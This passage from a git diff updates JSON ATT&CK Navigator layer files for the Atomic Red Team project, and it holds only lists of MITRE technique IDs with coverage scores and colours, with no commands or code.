Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T
1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.0
02","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 08f59b92..21e118de 100644 
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"tech
niqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006",
"score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"tec
hniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T12
18.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"tec
hniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabl
ed":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"technique
ID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"t
echniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","
score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabl
ed":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled
":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":
true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"ena